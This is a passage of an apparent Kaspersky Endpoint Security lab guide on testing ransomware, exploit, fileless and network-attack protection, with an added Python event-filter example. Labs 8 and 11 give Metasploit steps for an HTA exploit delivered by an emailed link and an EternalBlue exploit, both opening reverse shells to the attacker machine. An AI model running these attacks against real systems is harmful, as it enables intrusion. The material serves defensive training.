Invoke-WebRequest -uri "https://secure.eicar.org/eicar_com.zip" -OutFile "C:\temp\eicar_com.zip"
22. To make sure that the file has been saved successfully, open the C:\temp\ directory
23. Close the PowerShell window

Conclusion

This lab demonstrates how to add an application to the trusted list and exclude its encrypted traffic from scanning.

The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat
Protection, and Web Control components, and does not influence the Firewall or Network Threat Protection.

Lab 7.
How to test protection of network folders against ransomware
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If Kaspersky Endpoint
Security fails to detect a new malware version one day, the company will lose a lot of money. You want to use the Behavior
Detection protection component to counter ransomware.

Contents. In this lab, we will:

1. Simulate a ransomware infection
2. Check how the Behavior Detection protection component reacted
3. Allow encryption within network shared folders and configure exclusions for network devices
4. Make sure that exclusions for network devices work correctly

Task A: Simulate a ransomware infection

Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: Encrypts
files in shared network folders and deletes the originals.

Make sure that Kaspersky Endpoint Security 11.1 restored the invoice.txt file and the Alex user cannot modify files in the
network shared folder anymore.
The task is performed on Security-Center.

The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Go to Devices | Policies & Profiles
3. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
4. Switch to the Application Settings tab
5. In Advanced Threat Protection, select Host Intrusion Prevention
6. Disable Host Intrusion Prevention
7. Click OK
8. In Essential Threat Protection, select Firewall
9. Disable the Firewall
10. Click OK
11. Save the settings: Click Save
12. Confirm that you want to use the specified settings: Click Yes
13. Wait for the policy to be enforced
14. Restart the Tom-Laptop computer

Switch to the Alex-Desktop machine.

15. Open the shared folder \\tom-laptop\temp
16. Make sure that the invoice.txt file is there
17. Find the ransomware2.bat file on the desktop. It imitates the actions of file-encrypting ransomware
18. Run the ransomware2.bat file
19. Consult the contents of the folder \\tom-laptop\temp
20. Open the invoice.txt.aes file in Notepad
21. Make sure that the invoice.txt.aes file is encrypted
22. Close Notepad
23. Refresh the contents of the folder \\tom-laptop\temp
24. Make sure that the invoice.txt file has been recreated
Sometimes, the original file is not deleted because Behavior Detection blocks the remote connection as soon as it detects remote encryption, before the script deletes the original file.
25. Try to delete the encrypted file
26. Make sure that access is denied
Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine

Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that the protection
component performed.

The task is performed on Tom-Laptop.

The DC, Security-Center, and Alex-Desktop machines must be powered on.

27. Log on to the abc\Tom account, password Ka5per5Ky
28. Open the Kaspersky Endpoint Security interface
29. Open the application reports
30. Select Behavior Detection
31. Make sure that the malicious encryption activity attempted from IP 10.28.0.100 was blocked
32. Make sure that the C:\temp\invoice.txt file was restored
Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices

In some cases, Behavior Detection may consider operations performed by design engineering applications to be crypto-
ransomware activity. To prevent such false positives, we recommend that you add the computers concerned to the trusted list. Select the
Administration Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-Desktop computer to the list of
exclusions of the Behavior Detection component.

The task is performed on Security-Center.

The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

33. Open Kaspersky Security Center Web Console
34. Go to Devices | Policies & Profiles
35. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
36. Switch to the Application Settings tab
37. In Advanced Threat Protection, select Behavior Detection
38. Reconfigure protection of shared folders against external encryption: Switch the action from Block connection to Inform
39. To create an exclusion, click Add
40. Create an exclusion. Type the IP address of the Alex-Desktop workstation (10.28.0.100)
41. Click OK twice
42. Save the changes to the policy

Task D: Make sure that exclusions for trusted network devices work correctly

The task is performed on Alex-Desktop.

The DC, Security-Center, and Tom-Laptop machines must be powered on.

43. On the Alex-Desktop machine, log off and on again
44. Open the folder \\tom-laptop\temp\
45. Delete the file invoice.txt.aes
46. Find the ransomware2.bat file on the desktop
47. Run the ransomware2.bat file
48. Make sure that the invoice.txt file has been encrypted and the original invoice.txt file has not been restored
49. Delete the file invoice.txt.aes
50. Make sure that the file has been deleted correctly

Conclusion

In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with the default
settings. The Behavior Detection component takes care of that.

If necessary, the administrator can always specify exclusions for the protection component and allow specific network devices
to encrypt files in shared folders.
Lab 8.
How to check health of Exploit Prevention
Scenario. Criminals can exploit vulnerabilities far more easily than one would imagine. With a tool as powerful as the Metasploit
Framework, a criminal can create an exploit and send it to unsuspecting company employees.

Contents. In this lab, we will:

1. Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
2. Enable protection against exploits

Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer

On the Kali computer, run the Metasploit Framework penetration utility. Attack HTA (HTML Application) via PowerShell.

The task is performed on Tom-Laptop.

The DC, Security-Center, Alex-Desktop, and Kali machines must be powered on.

1. Exit Kaspersky Endpoint Security: Right-click its icon in the notification area and on the shortcut menu, select Exit

Switch to the Kali computer.

2. Log on to the root account. Password: Ka5per5Ky
3. Open a Terminal window
4. Start the Metasploit Framework console. Carry out the following command:
msfconsole
5. Select the exploit template. Carry out the following command:
use exploit/windows/misc/hta_server
You can use the TAB key to autocomplete commands
6. Display the list of applications vulnerable to this exploit. Carry out the following command:
show targets
7. Select to attack PowerShell x64. Carry out the following command:
set target 1
8. Specify the malicious payload. Carry out the following command:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
9. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
10. Activate the exploit. Carry out the following command:
exploit -j
11. Copy the link (right-click, Copy Link) http://10.28.0.50:8080/<name of the generated file>.hta from the Terminal to the clipboard
12. Open a new terminal instance
13. Start Mozilla Thunderbird. In the terminal, type
thunderbird
14. Create a new message:
— Specify the addressee. In the To: box, type [email protected]
— In the Subject: box, type Report
— Paste the link from the clipboard (http://10.28.0.50/<name of the generated file>.hta) into the message body
15. Click Send to dispatch the message
Switch to Tom-Laptop.

16. Open Microsoft Outlook
17. Select the received message
18. Open the link from the message in a browser
19. Save the file to the computer
20. In the warning window, click Run

Switch to the Kali computer.

21. Open the Metasploit Framework console
22. Make sure that a new session has been opened
23. Connect to the created session. Carry out the following command:
sessions 1
where 1 is the number of the recently created session
24. You have got full remote access to the Tom-Laptop machine
25. Run Command Prompt. Carry out the following command:
shell
Then you can carry out the whoami command to get the name of the active user:
whoami
Task B: Disable most of the protection components

In this task, you will disable most of the Kaspersky Endpoint Security protection components.

The task is performed on Security-Center.

The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

26. Open Kaspersky Security Center Web Console
27. Go to Devices | Policies & Profiles
28. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
29. Switch to the Application Settings tab
30. Disable the following protection components:
– KSN
– Behavior Detection
31. Switch to Essential Threat Protection
32. Disable the following protection components:
– File Threat Protection
– Web Threat Protection
– Mail Threat Protection
33. Click Save to save the policy settings. Confirm that you want to use the specified settings: Click Yes
34. Wait for the policy to be applied
Task C: Test protection against exploits

In this task, you will enable the Exploit Prevention component and test it.

The task is performed on Tom-Laptop.

The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on.

35. Close the web browser window
36. Restart the Tom-Laptop computer
37. Log on to the system
38. Open the main window of Kaspersky Endpoint Security
39. Click in the Protection components area
40. Make sure that the Exploit Prevention component is enabled
41. Go to the Downloads directory
42. Run the *.hta file
43. Note that a script run error has occurred
44. In the Script Error window, click No
45. Open Kaspersky Endpoint Security reports
46. Switch to the report of the Exploit Prevention component
47. Make sure that the exploit was detected

Switch to the Kali computer.

48. Log on to the root account. Password: Ka5per5Ky
49. Open the Metasploit console
50. Carry out the following command:
sessions
51. Note that there are no active sessions on the criminal's computer

Conclusion

In this lab, we made sure that the multitier defense of Kaspersky Endpoint Security can repel advanced threats
even when the main protection components are disabled.

Lab 9.
How to test protection against fileless threats
Scenario. Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system
administration and management tool. Criminals can run their code in the address space of the PowerShell process. A fileless
attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that stores its files on the local
drive. Typically, attacks via PowerShell are performed after the machine has been compromised using other malicious actions,
usually, exploitation of software vulnerabilities.

Contents. In this lab, we will disable KSN and test how the Antimalware Scan Interface (AMSI) detects fileless threats.
Make sure that AMSI detects fileless threats

The task is performed on Tom-Laptop.

The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Open c:\temp
2. Unpack the bsstest_amsi archive
3. Enter the password infected
4. Press WIN+R
5. Type powershell
6. Click OK
7. Go to the directory of the unpacked script. Carry out the following command:
cd c:\temp\bsstest_amsi\bsstest_amsi
8. Run the test PowerShell script. Carry out the following command:
.\bsstest_amsi.ps1
9. Make sure that Kaspersky Endpoint Security blocks the script


10. Open Kaspersky Endpoint Security reports
11. Select AMSI Protection Provider
12. Make sure that Kaspersky Endpoint Security has detected and neutralized the threat

Conclusion

You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently
interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code.

Lab 10.
Improve workstations' protection against ransomware
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new
malware version one day, the company will lose a lot of money. To decrease the risk, configure Host Intrusion Prevention to
prohibit all programs except trusted ones from editing documents on the computers.

Contents. In this lab, we will:

1. Simulate a ransomware infection
2. Prohibit all programs except trusted ones from editing and deleting documents
3. Configure Host Intrusion Prevention events to be stored on the Administration Server
4. Simulate encrypting a document and check the result

Task A: Simulate a ransomware infection

Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to encrypt text
documents and delete the original files.
The task is performed on Tom-Laptop.

The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Find the ransomware.bat and invoice.txt files on the desktop
2. Run the ransomware.bat file
3. Make sure that the invoice.txt file has gone, and the invoice.txt.aes file has appeared instead
4. Open the invoice.txt.aes file in Notepad
5. Make sure that the invoice.txt.aes file is encrypted
6. Close Notepad

Task B: Prohibit all programs except trusted ones from editing and deleting documents

Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of protected resources.
Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs except trusted ones from editing,
deleting, and creating files of this category.

The task is performed on Security-Center.

The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

7. Open Kaspersky Security Center Web Console
8. Go to Devices | Policies & Profiles
9. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
10. Switch to the Application settings tab
11. In Advanced Threat Protection, select Host Intrusion Prevention
12. Enable Host Intrusion Prevention
13. To open the list of rights, click the link Application rights and protected resources
14. To create a new category, in the left pane, click Add
15. Select Category of protected resources
16. Type Protected Files for the category name
17. Click the Operating system link
18. Select the Personal data subcategory
19. Click OK twice
20. To create a subcategory, in the left pane, click Add
21. Select Category of protected resources
22. Specify Documents for the name
23. Click the Operating system link
24. Specify the Protected Files subcategory
25. Click OK twice
26. Add file types to the category. In the left pane, click Add
27. For the resource type, select File or folder
28. In the Path box, enter *.txt, and in the Display name field, type txt
29. Click the Operating system link
30. Specify the Documents subcategory
31. Click OK twice
32. Specify rights for the created category: Select the category Personal data | Protected files | Documents | *.txt
33. Click the *.txt row
34. Prohibit applications that have Low and High Restricted reputation from editing the files belonging to this category: Change the action for the Write, Delete, and Create operations to Block
35. Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events for the Write, Delete, and Create actions
36. Click OK twice to save the access rights
37. Click Save to save the policy
38. Wait for the policy to be enforced
Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server

Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in restricted
group and Application privilege control rule triggered. Configure the policy to store these events on the Administration
Server.

The task is performed on Security-Center.

The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

39. Open Kaspersky Security Center MMC Console
40. Open the Kaspersky Endpoint Security for Windows policy
41. Switch to the Event configuration section and open the Info tab
42. Click the Event type header to sort the list alphabetically and select the event Application placed in restricted group
43. Open the event's properties: Click the Properties button below the list
44. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK
45. Select the event Host Intrusion Prevention was triggered and click Properties
46. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK
47. Click Save to save the policy
48. Wait for the policy to be enforced
49. Open the web console
50. Switch to the Monitoring & Reporting | Event Selections tab
51. To create a new event selection, click Add
52. Type Host Intrusion Prevention events for the selection name
53. Switch to the Events section
54. In the Application name list, select Kaspersky Endpoint Security
55. Select the Severity Level Info
56. Select the Include general events check box
57. On the list of events, select
— Application placed in restricted group
— Host Intrusion Prevention was triggered
58. Click Save
Task D: Simulate encrypting a document and check the result

Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt text
documents and delete the original files. Make sure that the script cannot delete the text file this time.

Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host Intrusion Prevention
that did not allow the script to delete the text document.

The task is performed on Alex-Desktop.


The DC, Tom-Laptop, and Security-Center machines must be powered on.

59. Find the ransomware.bat and invoice.txt files on the desktop
60. Run the ransomware.bat file
61. Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted
62. Switch to the Security-Center computer
63. Open Kaspersky Security Center Web Console
64. Switch to the Monitoring & Reporting | Event Selections tab
65. Tick the Host intrusion prevention events selection
66. Click Start to display the event selection
67. Study the events in the selection. Make sure that it was Host Intrusion Prevention that did not allow the program to delete the document

Conclusion

You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To properly protect
against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc.

Programs by known vendors, such as Microsoft Office, are trusted, and Host Intrusion Prevention will not restrict them.
Ransomware, even a new sample that has not yet been added to the signature database or KSN, will never get into the trusted
category and will not be able to edit documents.
Lab 11.
How to test Network Threat Protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. You scan your network periodically with a special security scanner to find out whether the computers are properly
shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any connections from the
attacking computer for an hour. Add the computer from which you perform vulnerability scanning to the list of exclusions.

Contents. In this lab, we will:

1. Imitate a network attack from Kali on Alex-Desktop
2. Study the Network attack report
3. Unblock the Kali computer
4. Configure the Network Threat Protection not to block Kali
5. Imitate an attack from Kali on Alex-Desktop and study the results

Task A: Imitate a network attack from Kali on Alex-Desktop

On the Kali computer, run the Metasploit Framework penetration testing utility. Perform an EternalBlue attack.

EternalBlue exploits a vulnerability in the Server Message Block (SMB) v1 protocol. An attacker can send a specially crafted
packet to a remote computer, thereby gain remote access to the system, and run arbitrary code there.

The task is performed on Kali.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Log on to the root account. Password—Ka5per5Ky
2. Run the terminal
3. Start the Metasploit Framework console. Carry out the following command:
   msfconsole
4. Select the exploit template. Carry out the following command:
   use exploit/windows/smb/ms17_010_eternalblue
5. Specify the malicious payload. Carry out the following command:
   set payload generic/shell_reverse_tcp
6. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
   set LHOST 10.28.0.50
7. Specify the address of the victim machine. Carry out the following command:
   set RHOST 10.28.0.100
8. Activate the exploit. Carry out the following command:
   exploit
   Note that you cannot exploit the vulnerability

The attack fails because Kaspersky Endpoint Security blocks network attacks by default.

Task B: Study the Network attack report

Find the list of reports in the Administration Console. Create a new template for the Network attack report. Generate the
report, consult the details of the network attack, find the addresses of the attacking and attacked machines.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

9. Open Kaspersky Security Center Web Console
10. Switch to the Monitoring & Reporting | Reports tab
11. Click Add
12. Name the report Network attack report
13. Under Statistics of threats, select Report on network attacks
14. Click Next
15. Click Next
16. Select to include information over the last 30 days
17. Click OK
18. In the message box, click Save and run
19. Switch to the Details tab
20. Find the IP address of the attacking computer and DNS name of the attacked machine in the report
21. Close the report
22. Switch to the Event Selections tab
23. Click Add to create a new event selection
24. Name the selection Network attacks
25. Switch to the Events section
26. In the Application name field, select Kaspersky Endpoint Security for Windows
27. For the Severity level, choose Critical
28. Select the check box Include general events
29. On the list of events, find and select the Network Attack detected event
30. Click Save to save the event selection
31. In the message box, tick Go to selection result and click Save
32. Study the events in the selection
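The event selections built above (Host Intrusion Prevention events in Lab 10, steps 49–58, and Network attacks here) apply three conditions to the Administration Server's event store: application, severity level and event type. The Python below is an added example, not code from the lab guide or from Kaspersky: it filters a constructed event export the same way and pulls out what the report's Details tab shows, the attacking address and the attacked host. The export layout (time | application | severity | event type | key=value details), the timestamps and the second attacking address 10.28.0.77 are assumptions; only the event names and the lab addresses come from the guide.

```python
"""Filter an Administration Server event export the way the lab's event selections do.

Added example, not code from the lab guide or from Kaspersky. The event lines are
constructed; their layout (time | application | severity | event type | key=value
details) is an assumption, not the real export format of Kaspersky Security Center.
"""
import re
from collections import Counter
from dataclasses import dataclass

KES = "Kaspersky Endpoint Security for Windows"

# Constructed sample export. Only the addresses 10.28.0.50 (Kali) and the host names
# come from the lab network; 10.28.0.77, the times and the details are made up.
SAMPLE_EVENTS = r"""
2019-06-03 10:01:12 | Kaspersky Endpoint Security for Windows | Critical | Network Attack detected | attacker=10.28.0.50 target=Alex-Desktop
2019-06-03 10:01:13 | Kaspersky Endpoint Security for Windows | Critical | Network Attack detected | attacker=10.28.0.50 target=Alex-Desktop
2019-06-03 10:20:05 | Kaspersky Endpoint Security for Windows | Critical | Network Attack detected | attacker=10.28.0.77 target=Tom-Laptop
2019-06-03 11:02:40 | Kaspersky Endpoint Security for Windows | Info | Application placed in restricted group | app=ransomware.bat group=Untrusted host=Alex-Desktop
2019-06-03 11:02:41 | Kaspersky Endpoint Security for Windows | Info | Host Intrusion Prevention was triggered | app=ransomware.bat action=delete file=C:\Users\Alex\Desktop\invoice.txt host=Alex-Desktop
2019-06-03 11:05:00 | Kaspersky Security Center Network Agent | Info | Filler event (constructed) | host=Tom-Laptop status=OK
"""


@dataclass
class Event:
    time: str
    application: str
    severity: str
    event_type: str
    details: dict  # parsed key=value pairs


def parse_events(text):
    """Parse the constructed export; one Event per non-empty line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, app, sev, etype, details = (p.strip() for p in line.split(" | ", 4))
        events.append(Event(time, app, sev, etype, dict(re.findall(r"(\w+)=(\S+)", details))))
    return events


def select_events(events, application=None, severities=(), event_types=()):
    """Apply the conditions the lab sets in the Web Console: application, severity, event type."""
    return [e for e in events
            if (application is None or e.application == application)
            and (not severities or e.severity in severities)
            and (not event_types or e.event_type in event_types)]


def network_attack_sources(events):
    """Attacker address -> number of blocked attacks, as the report's Details tab shows them."""
    hits = select_events(events, KES, ("Critical",), ("Network Attack detected",))
    return Counter(e.details["attacker"] for e in hits)


def attacked_hosts(events):
    """Names of the machines that reported a blocked network attack."""
    hits = select_events(events, KES, ("Critical",), ("Network Attack detected",))
    return sorted({e.details["target"] for e in hits})


def hips_blocked_actions(events):
    """(program, action, file) for each action Host Intrusion Prevention stopped (Lab 10 Task D)."""
    hits = select_events(events, KES, ("Info",), ("Host Intrusion Prevention was triggered",))
    return [(e.details["app"], e.details["action"], e.details["file"]) for e in hits]


def exclusion_candidates(events, threshold=2):
    """Addresses that trip Network Threat Protection repeatedly: your own scanner belongs on
    the exclusion list (Task D); an address you do not recognise is an incident to look into."""
    return sorted(ip for ip, n in network_attack_sources(events).items() if n >= threshold)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("attack sources:", dict(network_attack_sources(evs)))
    print("attacked hosts:", attacked_hosts(evs))
    print("HIPS blocked:", hips_blocked_actions(evs))
    print("exclusion candidates:", exclusion_candidates(evs))
```

Run as a script it prints the tallies for the sample. The exclusion_candidates helper is the practical side of Task D: an address that trips Network Threat Protection on every run is either the scanner you operate, which belongs on the exclusion list, or something to investigate, and since an excluded address is no longer blocked, the list should only hold addresses you control.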

Task C: Unblock the Kali computer

Open Kaspersky Endpoint Security on the attacked computer. Use the shortcut menu of the Firewall component to open
Network Monitor. Find the list of blocked computers and unblock the Kali computer.

The task is performed on Alex-Desktop.


The DC, Security-Center, Tom-Laptop, and Kali machines must be powered on.

33. Open Kaspersky Endpoint Security interface: Click its icon in the notification area
34. Click in the Protection components area
35. At the bottom of the window, click Network Monitor
36. The Network Monitor window will open
37. Switch to the Blocked computers tab
38. Unblock the Kali computer: Select address 10.28.0.50 and click Unblock
39. Close all Kaspersky Endpoint Security windows

Task D: Configure exclusions in the properties of Network Threat Protection

In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of trusted computers and
add the IP address of the Kali computer (10.28.0.50) to it.

The task is performed on Security-Center.


The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on.

40. Open Kaspersky Security Center Web Console
41. Go to Devices | Policies & Profiles
42. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
43. Switch to the Application Settings tab
44. Open the Essential Threat Protection section
45. Click the link Network Threat Protection
46. Open the list of trusted computers: Click the link Exclusions
47. Click Add to specify a device
48. Type the IP address of the Kali computer, 10.28.0.50, and click OK
49. Click OK
50. Click Save to save the policy
51. Wait for the policy to be enforced

Task E: Imitate an attack from Kali on Alex-Desktop and study the results

Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure that Kaspersky
Endpoint Security does not react to this attack anymore.

The task is performed on Kali.


The DC, Security-Center, Alex-Desktop, and Tom-Laptop machines must be powered on.

52. Log on to the root account. Password—Ka5per5Ky
53. Open a Terminal window
54. Activate the exploit again. Carry out the following command:
   exploit
55. Make sure that you have exploited the vulnerability in SMB protocol
56. Display the list of directories. Carry out the following command:
   dir

Conclusion

You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method
to exclude addresses of network security scanners.

Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center.
If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you
can create.

If none of them yet meets your needs, create a selection of events that interest you. Configure conditions: Event types, time,
group of computers, etc.

Lab 12.
How to configure exclusions from self-defense
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To remotely help employees, you connect to their machines through Windows Remote Assistance. However,
Kaspersky Endpoint Security does not react to your actions via Windows Remote Assistance. Make an exclusion for Windows
Remote Assistance to be able to manage Kaspersky Endpoint Security remotely.

Contents. In this lab, we will:

1. Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance
2. Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security
3. Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session

Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance

Run Windows Remote Assistance on Alex-Desktop, remember the ID and password. Run Windows Remote Assistance on
Tom-Laptop and connect to Alex-Desktop. Open Kaspersky Endpoint Security interface. Try to open the Reports window.

The task is performed on Alex-Desktop at first.


The DC, Security-Center, and Tom-Laptop machines must be powered on.

1. Run Outlook
2. Press WIN+R
3. Type msra in the field
4. Click OK

5. Select the option Invite someone you trust to help you

6. Select Use e-mail to send an invitation

7. Specify the addressee. In the To: box, type [email protected]
8. Click Send
9. Write down the remote connection password

Switch to Tom-Laptop

10. Log on to the abc\Tom account. Password—Ka5per5Ky
11. Run Outlook
12. In the Inbox, open the message from [email protected]
13. Click the attached file Invitation.*

14. Click Open

15. Type the remote connection password (see step 8)

Switch to the Alex-Desktop machine.

16. Allow Tom to connect to your workstation. In the window that opens,
click Yes

Switch to Tom-Laptop

17. Click Request control in the upper-left corner of the window

Switch to the Alex-Desktop machine.

18. Allow Tom to manage your workstation. In the window that opens,
click Yes

Switch to Tom-Laptop

19. Open Kaspersky Endpoint Security interface
20. Make sure that you cannot manage Kaspersky Endpoint Security remotely

Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security

Open the policy of Kaspersky Endpoint Security. Find the list of trusted programs. Add the msra.exe file to the list of trusted
applications. Allow it to interact with the Kaspersky Endpoint Security interface.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

21. Open Kaspersky Security Center Web Console
22. Go to Devices | Policies & Profiles
23. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
24. Switch to the Application Settings tab
25. Open the General Settings section
26. Open the list of exclusions: Click the Exclusions link
27. To add a trusted application, click the link Trusted applications in the lower-left corner of the window
28. To specify the service process of Microsoft Remote Assistance, click the Add button
29. In the Path box, type %systemroot%\system32\msra.exe
30. Clear the following checkboxes:
– Do not scan opened files
– Do not inherit restrictions of the parent process (application)
31. Allow Windows Remote Assistance to interact with KES interface: Select the check box Do not block interaction with the application interface and click OK
32. To save the list of applications, click OK
33. Click Save to save the policy
34. Wait for the policy to be enforced

Task C: Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session

Use Windows Remote Assistance to connect from Tom-Laptop to Alex-Desktop. Open the Reports window in Kaspersky
Endpoint Security.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

35. Open Kaspersky Endpoint Security reports: Click the Reports button
36. Close all Kaspersky Endpoint Security windows
37. Close all Windows Remote Assistance windows

Conclusion

You have allowed a remote access application to interact with Kaspersky Endpoint Security interface.
Lab 13.
How to configure password protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To prevent the users from disabling the protection, prohibit managing Kaspersky Endpoint Security and Network
Agent without a password.

Contents. In this lab, we will:

1. Find a computer where protection is off
2. Set a password for local management of Kaspersky Endpoint Security
3. Set a password for Network Agent uninstallation

Task A: Find a computer where protection is off

On Tom-Laptop, exit Kaspersky Endpoint Security.

Find the message informing that protection is disabled on some computers on the Monitoring page. Go to the selection of
computers where protection is off. Open the computer properties, find the Kaspersky Endpoint Security application and start it.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Log on to the abc\Tom account. Password—Ka5per5Ky
2. Exit Kaspersky Endpoint Security using the shortcut menu of its icon

Switch to the Security-Center computer.

3. Log on to the abc\Administrator account with the password Ka5per5Ky
4. Open Kaspersky Security Center Web Console
5. Switch to the Monitoring & Reporting | Dashboard tab
6. Note that one of the devices has the Critical protection status
7. Click the Critical link to consult the list of devices that have this status

8. Make sure that protection is not running on Tom-Laptop
9. Open the device properties: Click the link Tom-Laptop
10. Switch to the Applications tab
11. Select Kaspersky Endpoint Security and click Start
12. Close the computer properties and get back to Monitoring & reporting | Dashboard
13. Note that the protection status has changed from Critical to OK

Task B: Protect Kaspersky Endpoint Security with a password

In the policy of Kaspersky Endpoint Security for workstations, find password protection among the Interface settings. Enable
password protection and apply it to critical operations with Kaspersky Endpoint Security.

On the Tom-Laptop computer, try to exit Kaspersky Endpoint Security. Make sure that you cannot exit the application without
the password. Try to uninstall Kaspersky Endpoint Security through the Windows Control Panel. Make sure that this operation
is also password-protected.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

14. Open Kaspersky Security Center Web Console
15. Go to Devices | Policies & Profiles
16. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
17. Switch to the Application Settings tab
18. Open General Settings | Interface
19. Click the Password protection DISABLED switcher
20. Enter the password Ka5per5Ky
21. Click OK
22. Click Add to specify a user
23. Click the link Select user
24. In the search box, type alex
25. Choose the Alex account
26. Click Select
27. Tick the following operations:
– Configure application settings
– Remove / modify / restore the application
– Disable Kaspersky Security Center policy
– Exit the application
28. Click OK
29. Make sure that the Alex user has been added to the list
30. Click OK to save the changes
31. Save the policy: Click Save and Yes
32. Wait for the policy to be applied

Task C: Make sure that Kaspersky Endpoint Security is password-protected

Make sure that you need to enter credentials to perform some actions within the program.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

33. Log on to the abc\Tom account. Password—Ka5per5Ky
34. Try to exit KES using the shortcut menu of its icon in the taskbar
35. In the Password check window, enter the abc\Alex account and password Ka5per5Ky
36. Make sure that the application has been closed successfully
37. Open Programs and Features
38. Select Kaspersky Endpoint Security for Windows
39. Make sure that the Uninstall button is not available

Task D: Set a password for Network Agent uninstallation

Open the Network Agent policy and find the password protection settings there. Enable password protection, type a password
and make these settings required; meaning, prohibit users from modifying them.

On the Tom-Laptop computer, try to uninstall the Network Agent. Do not enter the password and make sure that you cannot
uninstall Network Agent without it.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

40. Open Kaspersky Security Center Web Console
41. Go to Devices | Policies & Profiles
42. Open the policy of Kaspersky Security Center Network Agent
43. Switch to the Application Settings tab
44. Enable password protection in the Settings section: Select to Use uninstall password
45. Enter the password Ka5per5Ky
46. Enforce the Use uninstall password settings (lock editing) and click Save
47. Wait for the policy to be applied

Switch to Tom-Laptop

48. Open Programs and Features
49. Select Kaspersky Security Network Agent
50. Click Uninstall to try to remove it
51. In the Windows information window, confirm that you want to uninstall the application
52. On the welcome page of the uninstall wizard, click Next
53. Click Next without entering a password
54. Make sure that Network Agent cannot be uninstalled without the password
55. Click OK to close the error message
56. Click Cancel to exit the wizard
57. Confirm that you want to exit: Click Yes
58. Click Finish to close the wizard

Conclusion

You have enabled password protection for Kaspersky Endpoint Security and Network Agent. Now the users cannot uninstall
Kaspersky Lab applications, exit Kaspersky Endpoint Security, or stop protection.

Neither can they stop the service or process of Kaspersky Endpoint Security. Kaspersky Endpoint Security self-defense
prevents this.

To hide from the users the fact that Kaspersky Endpoint Security is installed on the computer, select not to display the KES icon
in the notification area. This setting is located in the Interface section of the Kaspersky Endpoint Security policy.

Lab 14.
